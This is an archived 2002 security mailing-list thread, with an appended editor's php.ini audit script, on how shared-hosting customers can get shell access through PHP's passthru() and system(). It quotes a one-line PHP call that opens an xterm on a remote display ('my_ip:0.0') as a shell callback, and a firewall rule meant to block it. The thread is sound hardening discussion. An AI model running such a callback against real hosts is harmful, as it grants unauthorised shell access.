From: Lloyd Richardson (Lrichardson@mind.ca)
Date: Wed Apr 24 2002 - 17:01:25 CDT


    There are many ways of accomplishing the exact same thing. The problem is
    that giving an FTP account on the box allows them to upload things that
    are executable via the webserver (if they are allowed to run CGI scripts,
    etc.). You could write a very simple script to pass commands directly
    through the webserver that would run as whatever the virtually hosted
    customer's account was. (This is assuming Apache is running in a suexec
    environment with PHP compiled to run via CGI.) So basically, in a web
    hosting environment an end user can build their own shell access right
    into an HTTP page if the ISP doesn't provide it, which is really nothing
    new, and a good reason to keep an eye on suid local binaries....

    -----Original Message-----
    From: Evrim ULU [mailto:evrim@envy.com.tr]
    Sent: Tuesday, April 23, 2002 3:15 AM
    To: vuln-dev@security-focus.com
    Subject: php & passthru & system

    hi,

    I was wondering if there is a way to disable the passthru and system
    functions in PHP easily.

    There are a lot of webhosting firms serving PHP with FTP accounts, and
    I've seen that if their firewall is not configured properly I can open an
    xterm with my user privileges.

    <?
    passthru("`which xterm` --display=my_ip:0.0");
    ?>

    The same thing is also valid for system, of course.

    Abusing the system after having shell access is easy. Most sysadmins do
    not patch the system since nobody has valid shell access.

    Is there an easy way to disable these functions before compilation and
    after compilation, and any firewall rules like -A OUTPUT -p tcp
    --destination-port 6000 -j DROP?

    Thanks.

    -- 
    Evrim ULU
    evrim@envy.com.tr / evrim@core.gen.tr
    sysadm
    http://www.core.gen.tr
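
The direct answer to the question in the quoted post, as an example added by the editor and not code from either poster: PHP's disable_functions directive in php.ini turns off the named functions without recompiling, and it is a system-level directive, so a script cannot re-enable it with ini_set(). The shell audit below reads a php.ini and reports which process-spawning functions are still enabled. The function list and the sample php.ini are the editor's assumptions; the post names only passthru and system, and the other entries (exec, shell_exec, popen, proc_open, pcntl_exec) reach /bin/sh or fork a process just as well, so disabling only the two named ones leaves the same hole open.

```shell
#!/bin/sh
# Editor's added example, not code from the original thread.
# Audits a php.ini for process-spawning PHP functions left enabled.
# The DANGEROUS list is the editor's assumption: the post names only
# passthru and system, but every function below can launch a process.

DANGEROUS="passthru system exec shell_exec popen proc_open pcntl_exec"

# missing_disabled_functions PHP_INI
# Prints, one per line, each function in DANGEROUS that is NOT listed in
# the disable_functions directive of PHP_INI. Commented-out directives
# (leading ';') are ignored and the last live directive wins, as in PHP;
# double quotes, spaces around commas and trailing ';' comments are
# stripped before the comparison.
missing_disabled_functions() {
    ini="$1"
    disabled=$(grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$ini" \
        | tail -n 1 \
        | sed -e 's/^[^=]*=//' -e 's/;.*$//' -e 's/"//g' -e 's/,/ /g')
    for fn in $DANGEROUS; do
        found=0
        for d in $disabled; do
            [ "$d" = "$fn" ] && found=1
        done
        [ "$found" -eq 0 ] && printf '%s\n' "$fn"
    done
    return 0
}

# Demo on a constructed php.ini (editor's sample) that disables only the
# two functions the post mentions; the remaining spawn primitives are
# reported as still enabled.
demo_ini=$(mktemp) || exit 1
cat > "$demo_ini" <<'EOF'
[PHP]
; disable_functions = passthru,system,exec,shell_exec,popen,proc_open,pcntl_exec
disable_functions = passthru, system   ; enough to stop the xterm trick?
EOF
echo "still enabled in $demo_ini:"
missing_disabled_functions "$demo_ini"
rm -f "$demo_ini"
```

Two caveats a hosting admin would want alongside this. First, the firewall rule in the post drops only X display :0; displays :1 to :63 listen on TCP 6001 to 6063, so 6000:6063 is the minimum range, and even that only stops this one callback, since the same passthru() call can launch anything else that connects out. Second, the PHP CGI binary also looks for php.ini in its current working directory, so in the suexec-plus-CGI setup described in the reply a customer may be able to load their own php.ini; disable_functions is only as strong as the control over which php.ini gets read, and as the reply says, once scripts run as the customer's own uid the real boundary is what that uid can do on the host.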